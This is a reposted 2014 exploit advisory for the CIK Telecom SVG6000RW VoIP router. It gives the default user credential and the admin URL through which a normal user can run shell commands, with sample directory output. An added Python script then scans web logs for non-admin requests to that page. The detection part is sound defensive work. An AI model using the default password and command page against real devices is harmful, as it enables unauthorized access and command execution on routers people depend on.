CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution

Published: 19 Dec 2014. Reported by: Chako. Type: zdt. Source: 0day.today

####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################
 
Description:
  CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerability
  that can lead to Command Execution.
 
 
Exploit:
 
1) Log in as a normal user
   Default Username: User  Password: cikvoip
 
2) Change the URL to http://URL/adm/system_command.asp
   and you can now run commands.
 
 
Example:
 
Command: ls /etc_rw/web
 
Result:
 
internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm

#  0day.today [2018-01-05]  #
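
To detect the access pattern described above, a defender can scan web logs for requests to the admin page made by a non-admin account. The Python below is an added example, not part of the original advisory or of the vendor's code. It assumes a proxy in front of the router that writes Combined Log Format with the authenticated user name, and an administrator account named admin; the log lines are constructed.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

ADMIN_PATH = "/adm/system_command.asp"   # admin-only page named in the advisory
ADMIN_USERS = {"admin"}                  # assumption: accounts allowed to use it

# Assumption: Combined Log Format written by a proxy in front of the router.
LINE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                  r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def canonical_path(target):
    """Reduce a request target to one comparable spelling of its path."""
    path = re.sub(r"^[a-z]+://[^/]*", "", target, flags=re.I)  # absolute-form URL
    path = path.split("?", 1)[0].split("#", 1)[0]
    for _ in range(3):                    # undo nested percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/").lstrip("/")
    # normpath collapses "//" and resolves "." and ".." segments; lower() errs
    # towards flagging in case the web server matches names case-insensitively.
    return normpath("/" + path).lower()

def suspicious_requests(lines):
    """Return (ip, user, timestamp, status) for admin-page requests by non-admins."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if m and canonical_path(m["target"]) == ADMIN_PATH \
                and m["user"] not in ADMIN_USERS:
            hits.append((m["ip"], m["user"], m["ts"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [10/Dec/2014:09:00:01 +0000] "GET /adm/system_command.asp HTTP/1.1" 200 512',
    '192.0.2.23 - User [10/Dec/2014:09:05:12 +0000] "GET /home.asp HTTP/1.1" 200 2048',
    '192.0.2.23 - User [10/Dec/2014:09:05:40 +0000] "GET /adm/system_command.asp HTTP/1.1" 200 512',
    '192.0.2.23 - User [10/Dec/2014:09:06:02 +0000] "POST /ADM//system%5Fcommand.asp?x=1 HTTP/1.1" 200 512',
    '192.0.2.31 - - [10/Dec/2014:09:07:00 +0000] "GET /adm/system_command.asp HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("non-admin request to %s: %s" % (ADMIN_PATH, hit))
```

A 200 status for a non-admin user is the case the advisory describes; the status is kept in each result so denied requests can be triaged separately.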